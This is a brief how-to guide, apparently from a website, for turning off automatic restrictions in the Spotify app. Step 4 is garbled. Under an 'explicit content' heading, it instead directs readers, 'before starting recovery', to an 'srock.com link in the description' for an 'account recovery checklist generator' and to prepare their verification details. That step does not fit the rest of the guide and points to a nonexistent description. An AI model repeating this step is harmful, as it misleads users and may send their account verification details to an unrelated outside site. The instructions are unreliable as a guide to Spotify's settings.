If you want to disable automatic restrictions on Spotify, follow these simple steps to regain control over your listening experience. This guide will help you navigate the settings effectively. Step 1. Open Spotify app. Launch the Spotify app on your device. Ensure you are logged into your account to access all settings. Step 2. Go to Settings. Tap on the gear icon or the Settings option, usually found in the top right corner of the app. This will take you to the Settings menu where you can adjust various preferences. Step 3. Locate Playback Settings. Scroll down to find the Playback section within the Settings menu. Here, you will find options related to how your music plays and any restrictions that may be applied. Step 4. Adjust explicit content settings. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Save changes and restart. After making your adjustments, ensure that any changes are saved. It may be helpful to restart the app to ensure that the new settings take effect properly. By following these steps, you should be able to disable automatic restrictions on Spotify and enjoy your music without limitations. If you encounter any issues, consider checking for app updates or consulting Spotify's help resources.